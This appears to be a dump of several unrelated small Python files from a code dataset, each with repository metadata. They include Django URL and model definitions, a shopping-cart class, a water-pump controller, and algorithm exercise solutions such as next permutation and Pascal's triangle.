                           (float, "momentum", "GeV/$c$"))
for i in range(200):
    x = random() * 2
    y = random() + random() + random() + random() - 2
    scatter << (x, y)

# Two side-by-side plots of the same scatter: full view with star markers
# (overflows off) and a zoomed view with explicit ranges (overflows on).
layout = GridLayout(2, 1, aspect=1)
plot = hep.hist.plot.Plot(2, overflows=False,
                          marker="*", marker_size=5 * point)
plot.append(scatter)
layout[0, 0] = plot
plot = hep.hist.plot.Plot(2)
plot.append(scatter, overflows=True, x_range=(0, 1.8), y_range=(-1, 1))
layout[1, 0] = plot

# Render to PostScript and to an X11 window.
hep.draw.postscript.PSFile("plotscatter1.ps").render(layout)
window = hep.draw.xwindow.FigureWindow(layout, (0.23, 0.1))
# Python 2 raw_input: keeps the window open when run with any CLI argument.
if len(sys.argv) > 1:
    raw_input("hit enter to end: ")
|
[
"alex@alexsamuel.net"
] |
alex@alexsamuel.net
|
d2823e6997c2111264e3da0f80476e590dfddc56
|
14744766d01d6719097fa6d2b0a9db42226c114b
|
/mysite/mysite/urls.py
|
2700207fc7d9c265b503210e668e09142c8f1569
|
[] |
no_license
|
jakiiii/Django-2-by-Example
|
8f491a23b7c45ef71a866622ec45dab9909ad212
|
6b3c68b7d54b6c763bba30be5c8b48d257cd97f5
|
refs/heads/master
| 2023-03-10T00:09:37.688697
| 2021-02-26T19:27:24
| 2021-02-26T19:27:24
| 342,679,630
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,033
|
py
|
"""mysite URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from django.contrib.sitemaps.views import sitemap
from blog.sitemaps import PostSitemap
# Sitemap registry for django.contrib.sitemaps' sitemap view (route below
# is currently commented out).
sitemaps = {
    'posts': PostSitemap
}

urlpatterns = [
    path('admin/', admin.site.urls),
    path('blog/', include('blog.urls')),
    # path('sitemap.xml', sitemap, {'sitemaps': sitemaps}, name='django.contrib.sitemaps.views.sitemap')
]
|
[
"me.jaki@outlook.com"
] |
me.jaki@outlook.com
|
90f95244f05c1263c0d096e6db8ca9eb041850be
|
3ee0c019a7b10a7a78dfc07d61da5d2b3cf3ad27
|
/190808/10815_num_card.py
|
b0e15f15f74903dcf0fac31456922a98aaf35c0b
|
[] |
no_license
|
JiminLee411/algorithms
|
a32ebc9bb2ba4f68e7f80400a7bc26fd1c3a39c7
|
235834d1a50d5054f064bc248a066cb51c0835f5
|
refs/heads/master
| 2020-06-27T01:37:55.390510
| 2019-11-14T08:57:16
| 2019-11-14T08:57:16
| 199,811,134
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 295
|
py
|
"""BOJ 10815: for each query number, print 1 if Sang-geun owns that card."""
import sys
sys.stdin = open('10815_input.txt', 'r')

M = int(input())
my = list(map(int, input().split()))
N = int(input())
value = list(map(int, input().split()))

# O(1) membership via a set instead of scanning the list per query
# (the original `value[i] in my` made the whole loop O(N*M)).
owned = set(my)
comp = ['1' if v in owned else '0' for v in value]
res = ' '.join(comp)
print(res)
|
[
"wlals41189@gmail.com"
] |
wlals41189@gmail.com
|
775de92b67b22c79f8edaac2f60a42285e0b6576
|
f942f82fb1b9c2eb0c4cf03ca2254f4207fd08d2
|
/Products/urls.py
|
b5a99b7be68470e2ae719e7f66d3f28dde8ef522
|
[] |
no_license
|
mahdy-world/Fatoma-Restaurant
|
2b6aec149c20d5526d5d7a505479cc29c811d666
|
a500397741e72d0cf28dbb8f64c914144835d6c2
|
refs/heads/master
| 2023-06-27T19:27:35.606292
| 2021-07-31T13:53:18
| 2021-07-31T13:53:18
| 391,366,717
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,985
|
py
|
# URL routing for the Products app.  Most models follow the same CRUD
# pattern: list, create, trash (soft-deleted) list, edit, delete, and an
# XLS export view.
from .views import *
from django.urls import path

app_name = 'Products'

urlpatterns = [
    # Main categories (full CRUD + trash + XLS export).
    path('main_categories/', MainCategoryList.as_view(), name='MainCategoryList'),
    path('main_categories/new/', MainCategoryCreate.as_view(), name='MainCategoryCreate'),
    path('main_categories/trash/', MainCategoryTrashList.as_view(), name='MainCategoryTrashList'),
    path('main_categories/<int:pk>/edit/', MainCategoryUpdate.as_view(), name='MainCategoryUpdate'),
    path('main_categories/<int:pk>/delete/', MainCategoryDelete.as_view(), name='MainCategoryDelete'),
    path('main_categories/xls', MainCategoryXls , name='MainCategoryXls'),
    # Sub categories.
    path('sub_categories/', SubCategoryList.as_view(), name='SubCategoryList'),
    path('sub_categories/new/', SubCategoryCreate.as_view(), name='SubCategoryCreate'),
    path('sub_categories/trash/', SubCategoryTrashList.as_view(), name='SubCategoryTrashList'),
    path('sub_categories/<int:pk>/edit/', SubCategoryUpdate.as_view(), name='SubCategoryUpdate'),
    path('sub_categories/<int:pk>/delete/', SubCategoryDelete.as_view(), name='SubCategoryDelete'),
    path('sub_categories/xls', SubCategoryXls , name='SubCategoryXls'),
    # Manufacturers.
    path('manufactures/', ManufactureList.as_view(), name='ManufactureList'),
    path('manufactures/new/', ManufactureCreate.as_view(), name='ManufactureCreate'),
    path('manufactures/trash/', ManufactureTrashList.as_view(), name='ManufactureTrashList'),
    path('manufactures/<int:pk>/edit/', ManufactureUpdate.as_view(), name='ManufactureUpdate'),
    path('manufactures/<int:pk>/delete/', ManufactureDelete.as_view(), name='ManufactureDelete'),
    path('manufactures/xls', ManufactureXls , name='ManufactureXls'),
    # Brands.
    path('brands/', BrandList.as_view(), name='BrandList'),
    path('brands/new/', BrandCreate.as_view(), name='BrandCreate'),
    path('brands/trash/', BrandTrashList.as_view(), name='BrandTrashList'),
    path('brands/<int:pk>/edit/', BrandUpdate.as_view(), name='BrandUpdate'),
    path('brands/<int:pk>/delete/', BrandDelete.as_view(), name='BrandDelete'),
    path('brands/xls', BrandXls , name='BrandXls'),
    # Units (no trash list or XLS export).
    path('units/', UnitList.as_view(), name='UnitList'),
    path('units/new/', UnitCreate.as_view(), name='UnitCreate'),
    path('units/<int:pk>/edit/', UnitUpdate.as_view(), name='UnitUpdate'),
    path('units/<int:pk>/delete/', UnitDelete.as_view(), name='UnitDelete'),
    # Products, including a card view and grouped-product contents.
    path('products/', ProductList.as_view(), name='ProductList'),
    path('products/new/', ProductCreate.as_view(), name='ProductCreate'),
    path('products/trash/', ProductTrashList.as_view(), name='ProductTrashList'),
    path('products/<int:pk>/edit/', ProductUpdate.as_view(), name='ProductUpdate'),
    path('products/<int:pk>/delete/', ProductDelete.as_view(), name='ProductDelete'),
    path('products/<int:pk>/show/', ProductCard.as_view(), name='ProductCard'),
    path('products/<int:pk>/add_content/', GroupedProductCreate.as_view(), name='GroupedProductCreate'),
    path('product/xls', ProductXls, name='ProductXls'),
    # NOTE(review): GroupedProductDelete is routed without .as_view() —
    # presumably a function-based view; confirm in .views.
    path('grouped_product/<int:pk>/edit/', GroupedProductUpdate.as_view(), name='GroupedProductUpdate'),
    path('grouped_product/<int:pk>/delete/', GroupedProductDelete, name='GroupedProductDelete'),
    # Taxes (TaxDelete is also a function-based view).
    path('taxes/', TaxesList.as_view(), name='TaxesList'),
    path('tax/new/', TaxCreate.as_view(), name='TaxCreate'),
    path('tax/<int:pk>/edit/', TaxUpdate.as_view(), name='TaxUpdate'),
    path('tax/delete/<int:id>/', TaxDelete , name='TaxDelete'),
    path('tax/xls', TaxXls , name='TaxXls'),
    # Product prices keyed by product pk and price pk.
    path('prices_product/<int:pk>/<int:ppk>/edit/', PricesProductUpdate.as_view(), name='PricesProductUpdate'),
    path('prices_product/<int:pk>/<int:ppk>/delete/', PricesProductDelete.as_view(), name='PricesProductDelete'),
    path('prices_product/<int:pk>/<int:ppk>/stop/', PricesProductStop.as_view(), name='PricesProductStop'),
    path('prices_product/<int:pk>/<int:ppk>/active/', PricesProductActive.as_view(), name='PricesProductActive'),
]
|
[
"salmazidan1997@gmail.com"
] |
salmazidan1997@gmail.com
|
9f8ce2a8babfebf2df4043994027fbb07c66730e
|
303d61b95651407951af11224df32a6b2c54ee0a
|
/medium/Next_Permutation.py
|
fc77b475ef0b932927fcfe83d9ff98e16b4db50f
|
[] |
no_license
|
junghyun4425/myleetcode
|
6e621e8f1641fb8e55fe7063b563d0cec20373a6
|
f0ad1e671de99574e00b4e78391d001677d60d82
|
refs/heads/master
| 2023-07-22T12:27:23.487909
| 2021-08-24T10:01:49
| 2021-08-24T10:01:49
| 317,727,586
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,776
|
py
|
# Problem Link: https://leetcode.com/problems/next-permutation/
'''
Problem summary: produce the arrangement that comes next in permutation order.
ask: [4,5,3,2,1]
answer: [5,1,2,3,4]
Notes:
This problem tests whether you understand exactly how the next permutation is
generated internally; without that knowledge it could be rated hard (the
implementation itself is not difficult).
The first rule I guessed did not hold for other examples, so I studied how
permutations work. Walk from the right until a value decreases, then scan the
suffix for the element closest to (but larger than) that value, swap the two,
and finally reverse the remaining suffix to obtain the next permutation.
I could not solve this alone for lack of mathematical intuition, so I should
practice more problems of this kind.
'''
class Solution:
    def nextPermutation(self, nums: List[int]) -> None:
        """
        Rearrange `nums` into its lexicographically next permutation.

        Do not return anything, modify nums in-place instead.
        """
        size = len(nums)

        # Walk from the right to find the pivot: the first index whose value
        # is smaller than the value immediately to its right.
        pivot = -1
        for idx in range(size - 1, 0, -1):
            if nums[idx - 1] < nums[idx]:
                pivot = idx - 1
                break

        if pivot < 0:
            # The whole sequence is non-increasing; the "next" permutation
            # wraps around to the smallest one.
            nums.sort()
            return

        # The suffix right of the pivot is non-increasing, so the rightmost
        # element strictly greater than the pivot sits just before the first
        # element that is <= the pivot (default: the very last element).
        successor = size - 1
        for idx in range(pivot + 1, size):
            if nums[pivot] >= nums[idx]:
                successor = idx - 1
                break

        nums[pivot], nums[successor] = nums[successor], nums[pivot]
        # Reversing the (still non-increasing) suffix makes it ascending,
        # giving the smallest arrangement under the new prefix.
        nums[pivot + 1:] = nums[:pivot:-1]
|
[
"junghyun153@naver.com"
] |
junghyun153@naver.com
|
fd5344b926e350d8600958ffe81b5cb0bb28003e
|
942ee5e8d54e8ebe9c5c841fbfdd1da652946944
|
/2001-2500/2047.Number of Valid Words in a Sentence.py
|
61409d08dd04438bf07ff937138d7d7ef84c61dc
|
[] |
no_license
|
kaiwensun/leetcode
|
0129c174457f32887fbca078fb448adce46dd89d
|
6b607f4aae3a4603e61f2e2b7480fdfba1d9b947
|
refs/heads/master
| 2023-08-31T07:30:50.459062
| 2023-08-27T07:59:16
| 2023-08-27T07:59:16
| 57,526,914
| 69
| 9
| null | 2023-08-20T06:34:41
| 2016-05-01T05:37:29
|
Python
|
UTF-8
|
Python
| false
| false
| 751
|
py
|
class Solution:
    def countValidWords(self, sentence: str) -> int:
        """Count the whitespace-separated tokens of `sentence` that pass the
        valid-word checks: no digits, everything before the last character is
        a lowercase letter or hyphen, at most one hyphen placed strictly
        inside the token, and any trailing '!', '.' or ',' not preceded by a
        hyphen."""

        def is_valid(token: str) -> bool:
            last = token[-1]
            # A digit or a hyphen can never terminate a valid word.
            if last.isdigit() or last == '-':
                return False
            # Everything before the final character must be a lowercase
            # letter or a hyphen (punctuation is only legal at the end).
            for ch in token[:-1]:
                if ch != '-' and not 'a' <= ch <= 'z':
                    return False
            first_hyphen = token.find('-')
            if first_hyphen != -1:
                # At most one hyphen, and it must sit strictly inside.
                if token.count('-') > 1:
                    return False
                if first_hyphen in (0, len(token) - 1):
                    return False
            # Trailing punctuation may not directly follow a hyphen.
            if last in '!,.' and len(token) > 1 and token[-2] == '-':
                return False
            return True

        return sum(1 for token in sentence.split() if is_valid(token))
|
[
"skw_kevin@126.com"
] |
skw_kevin@126.com
|
18478bb44f33657f03bdf040d15e4e64e04aa750
|
5aca02672a97255956edb21f50de2854e62f6210
|
/Projeto/carrinho.py
|
3093c1f02058d6a763d8a19d4d1561b9eeec646f
|
[] |
no_license
|
Pedro-H-Castoldi/descobrindo_Python
|
ea54a75e577a85fdc1e7284643447fadd950ba6e
|
287290c6ee8b34142d5e7c27cdc7b2edebf23819
|
refs/heads/master
| 2020-09-04T17:39:11.514124
| 2020-04-27T15:55:15
| 2020-04-27T15:55:15
| 219,834,848
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,395
|
py
|
import cliente
from produto import Produto
from compra import Compra
class Carrinho:
    """Interactive shopping cart: verifies the customer, fills the cart from
    stock, and hands the cart to Compra for checkout.

    NOTE(review): all prompts are Portuguese strings read from stdin, so this
    class only works in an interactive console session.
    """

    def __init__(self):
        # One entry is appended per purchased unit, so the same Produto
        # object may appear several times in this list.
        self.__l_carrinho = []

    @property
    def l_carrinho(self):
        # The current cart contents (one entry per unit).
        return self.__l_carrinho

    @property
    def cliente(self):
        # NOTE(review): __cliente is only assigned inside conferir_cliente();
        # reading this property earlier raises AttributeError — confirm that
        # callers always check the customer first.
        return self.__cliente

    def conferir_cliente(self):
        """Ask for the customer's full name and, when the lookup succeeds,
        store the customer and start filling the cart."""
        c_cliente = str(input('Insira o nome completo do cliente: ')).title()
        # cliente_dados presumably returns the customer record, or a falsy
        # value for an unknown name — TODO confirm in the cliente module.
        c_cliente = cliente.Cliente.cliente_dados(c_cliente)
        if c_cliente:
            self.__cliente = c_cliente
            self.encher_carrinho()

    def encher_carrinho(self):
        """Prompt-driven loop that fills the cart and ends by checking out
        (option 2), emptying the cart (option 0), or continuing to shop."""
        self.__l_carrinho.clear()
        while True:
            c_produto = str(input('Insira o nome do produto: ')).title()
            c_produto = Produto.produto_dados(c_produto)
            # NOTE(review): ver_estoque runs before the lookup result is
            # checked — confirm it tolerates a falsy argument.
            Produto.ver_estoque(c_produto)
            if c_produto:
                if c_produto.estoque:
                    while True:
                        cont = 0
                        quant = int(input(f'Quantidade de {c_produto.nome} X {c_produto.quant} : '))
                        if quant > 0 and c_produto.quant >= quant:
                            # Append one cart entry per unit requested.
                            while cont < quant:
                                cont += 1
                                self.l_carrinho.append(c_produto)
                            break
                        elif quant <= 0:
                            print('Insira uma quantidade válida.')
                        else:
                            # More units requested than in stock: retry or cancel.
                            print(f'A quantidade pedida é maior que a quantidade em estoque.')
                            print(f'O produto {c_produto.nome} tem em estoque {c_produto.quant} unidade(s).')
                            op = int(input(f'1- Tentar novamente | 0- Cancelar: '))
                            if op != 1:
                                break
                else:
                    print('Produto faltando.')
            if not self.l_carrinho:
                op = int(input('1- Continuar comprando | 0- Sair: '))
                if op == 0:
                    break
            else:
                op = int(input('1- Continuar Comprando | 2- Ir para o Caixa | 0- Desfazer Carrinho: '))
                if op == 2:
                    # Hand the filled cart to the checkout flow.
                    comprar = Compra(self)
                    comprar.comprar()
                    break
                elif op == 0:
                    # Undo: empty the cart and stop shopping.
                    self.l_carrinho.clear()
                    break
|
[
"pedrohenriquecastoldi.b@hotmail.com"
] |
pedrohenriquecastoldi.b@hotmail.com
|
06e79f4fad2a731cc1739d26a7409b37dde32769
|
ee974d693ca4c4156121f8cb385328b52eaac07c
|
/env/share/doc/networkx-2.3/examples/graph/plot_erdos_renyi.py
|
fac52504b6282d6fbd3e5053ad050c7eb81c27b2
|
[
"BSD-3-Clause"
] |
permissive
|
ngonhi/Attendance_Check_System_with_Face_Recognition
|
f4531cc4dee565d0e45c02217f73f3eda412b414
|
92ff88cbc0c740ad48e149033efd38137c9be88d
|
refs/heads/main
| 2023-03-12T07:03:25.302649
| 2021-02-26T15:37:33
| 2021-02-26T15:37:33
| 341,493,686
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 128
|
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:52554e74245d7822f751aeac81b4fc199ee16f088cc89c0e0df4143f9aa34b7c
size 973
|
[
"Nqk180998!"
] |
Nqk180998!
|
606c5dd07fdcaf37ce7afc906c9394115452de74
|
58f38f1d69d4bfc650ad18e0045c36ae29c9d84a
|
/Django基础部分代码/chapter04/orm_intro_demo/book/models.py
|
f9d8ccf147cc08f68a92fa89d2d320b01ccbd649
|
[] |
no_license
|
zjf201811/DjangoWebProject
|
0670c61b89387901089bf67cf2423d9341f69913
|
fab15784fb326ba4517951e180418ea54de03afe
|
refs/heads/master
| 2020-04-18T12:03:08.798484
| 2019-05-06T03:59:46
| 2019-05-06T03:59:46
| 167,522,193
| 3
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 927
|
py
|
from django.db import models
# To turn a plain class into an ORM model that can be mapped to the database,
# its parent class must be models.Model or one of its subclasses.
class Book(models.Model):
    """A book record: auto-increment id, title, author, and price."""
    # 1. id: int, auto-incrementing primary key.
    id = models.AutoField(primary_key=True)
    # 2. name: varchar(100), the book's title.
    name = models.CharField(max_length=100,null=False)
    # 3. author: varchar(100), the book's author.
    author = models.CharField(max_length=100,null=False)
    # 4. price: float, the book's price (defaults to 0).
    price = models.FloatField(null=False,default=0)
class Publisher(models.Model):
    """A publisher record: required name and address columns."""
    name = models.CharField(max_length=100,null=False)
    address = models.CharField(max_length=100,null=False)
# 1. Use makemigrations to generate the migration script files
#    python manage.py makemigrations
# 2. Use migrate to apply the newly generated migration scripts to the database
#    python manage.py migrate
|
[
"thor201105@163.com"
] |
thor201105@163.com
|
7fcbc5d0f076d7dc308177281f13613842aee435
|
3d91b4f3ac42056b1a8205b1f5a62b5ca05ded43
|
/expences_tracker/expences_tracker/asgi.py
|
493e3e68aa4b22d3960adb960d7b5cb825e3e1da
|
[] |
no_license
|
olgayordanova/Python_Web
|
be34027a7755d5c178164995edb25f173a7fcdb4
|
3dfc6df65bffb109d5e26e9d1a496158b196c62f
|
refs/heads/main
| 2023-05-31T03:54:29.515864
| 2021-07-09T11:29:14
| 2021-07-09T11:29:14
| 373,501,975
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 425
|
py
|
"""
ASGI config for expences_tracker project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/asgi/
"""
import os

from django.core.asgi import get_asgi_application

# The settings module must be set before the application object is built.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'expences_tracker.settings')

# Module-level ASGI callable that servers import and serve.
application = get_asgi_application()
|
[
"noreply@github.com"
] |
olgayordanova.noreply@github.com
|
0577c21f81b162c1e5ff6065204cee92f06948df
|
2626f6e6803c8c4341d01f57228a0fe117e3680b
|
/students/rmart300/lesson06_testing/water-regulation/decider.py
|
2eb9b68c36c9f1fdd19733e2dd733124b51d7852
|
[] |
no_license
|
kmsnyde/SP_Online_Course2_2018
|
9e59362da253cdec558e1c2f39221c174d6216f3
|
7fe8635b47d4792a8575e589797260ad0a2b027e
|
refs/heads/master
| 2020-03-19T17:15:03.945523
| 2018-09-05T22:28:55
| 2018-09-05T22:28:55
| 136,750,231
| 0
| 0
| null | 2018-06-09T19:01:52
| 2018-06-09T19:01:51
| null |
UTF-8
|
Python
| false
| false
| 3,167
|
py
|
"""
Encapsulates decision making in the water-regulation module
"""
class Decider(object):
    """
    Encapsulates decision making in the water-regulation module
    """

    def __init__(self, target_height, margin):
        """
        Create a new decider instance for this tank.

        :param target_height: the target height for liquid in this tank
        :param margin: the margin of liquid above and below the target height for
                       which the pump should not turn on. Ex: .05 represents a
                       5% margin above and below the target_height.
        """
        self.target_height = target_height
        self.margin = margin

    def decide(self, current_height, current_action, actions):
        """
        Decide a new action for the pump, given the current height of liquid
        in the tank and the current action of the pump.  The new action MAY
        be the same as the current one.

        Behaviors:
          1. Pump off and height below the margin region -> PUMP_IN.
          2. Pump off and height above the margin region -> PUMP_OUT.
          3. Pump off and height inside the margin region (boundaries
             included) -> remain PUMP_OFF.
          4. PUMP_IN and height above the target -> PUMP_OFF,
             otherwise remain PUMP_IN.
          5. PUMP_OUT and height below the target -> PUMP_OFF,
             otherwise remain PUMP_OUT.

        :param current_height: the current height of liquid in the tank
        :param current_action: the current action of the pump
        :param actions: a dictionary containing the keys 'PUMP_IN',
                        'PUMP_OFF', and 'PUMP_OUT'
        :return: one of actions['PUMP_IN'], actions['PUMP_OUT'],
                 actions['PUMP_OFF']
        """
        # BUG FIX: `margin` is documented as a *fraction* of the target
        # height (.05 == 5%), but the previous code added/subtracted it as
        # an absolute height.  Compute the no-action band multiplicatively.
        low = self.target_height * (1 - self.margin)
        high = self.target_height * (1 + self.margin)

        if current_action == actions['PUMP_OFF']:
            # Behaviors 1-3: pump toward the target only when outside the band.
            if current_height < low:
                return actions['PUMP_IN']
            if current_height > high:
                return actions['PUMP_OUT']
            return actions['PUMP_OFF']

        if current_action == actions['PUMP_IN']:
            # Behavior 4: stop filling once the target is exceeded.
            if current_height > self.target_height:
                return actions['PUMP_OFF']
            return actions['PUMP_IN']

        # Behavior 5: currently PUMP_OUT — stop draining below the target.
        if current_height < self.target_height:
            return actions['PUMP_OFF']
        return actions['PUMP_OUT']
|
[
"kmsnyder2@verizon.net"
] |
kmsnyder2@verizon.net
|
f64ad10e4891ecd5d12b68ca45714966f1a8b852
|
1cc17b2eb1c885389126299602dbaa3bbd1e6dd7
|
/liaoxuefeng_python/base/demo09.py
|
0db64ffc3cdfddd6f88c8a49b443f24fc835d0c8
|
[] |
no_license
|
shulu/python_note
|
e611093ff2af321fbc889167424574b214052b44
|
93b101a1723d2d47b435a25e81e447f0d5d95022
|
refs/heads/master
| 2021-01-02T22:47:53.717930
| 2019-03-26T08:55:48
| 2019-03-26T08:55:48
| 99,391,822
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 237
|
py
|
# -*- coding: utf-8 -*-
def triangles():
    """Yield the rows of Pascal's triangle, starting from [1]."""
    row = [1]
    while True:
        yield row
        # Each interior entry is the sum of the two entries above it.
        row = [1] + [left + right for left, right in zip(row, row[1:])] + [1]


# Print the first 10 rows.
for count, row in enumerate(triangles(), start=1):
    print(row)
    if count == 10:
        break
|
[
"qq961085397@163.com"
] |
qq961085397@163.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.